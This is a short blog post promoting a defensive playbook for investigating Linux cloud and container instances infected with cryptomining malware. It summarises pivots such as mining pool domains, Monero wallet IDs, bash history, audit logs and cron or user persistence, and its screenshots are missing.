New Playbook on Responding to Mining Malware in Linux Container and Cloud Environments

We've released a new playbook! This time specifically on responding to Linux instances compromised by mining malware. As it's such a common thing we see in both cloud and container environments.

You can get the playbook here or view some highlights below:

Working out where to start your investigation is generally pretty easy as coin miners are so obvious. TLDR? Ctrl + F "xmrig" and you'll normally find something pretty quick!

Skipping ahead a bit... you'll typically find a ton of shell scripts, including at least one to install mining software:

This should lead to one of your investigation "Pivot Points" - searching for other files containing the domain name of the mining pool that the mining software talks to:

These days most miners choose to mine Monero (it's more profitable than mining Bitcoin and harder to trace) and you can pivot on the Monero wallet ID. A quick Google of it will also often tell you what particular campaign you're dealing with - including how the attackers got in and what backdoors were likely added:

The bash history is always worth checking, although these days many miners will wipe it once they finish installing:

Something else we've found super useful - but not discussed that often- is the Audit Log on many Linux distributions - including Amazon Linux:

Finally, always check for persistence. Normally these mining campaigns are smash and grab - but they also install backdoors for more manual access later including adding users and scheduled tasks to cron:

And.. that's it! If you'd like to grab the full PDF you can do so here.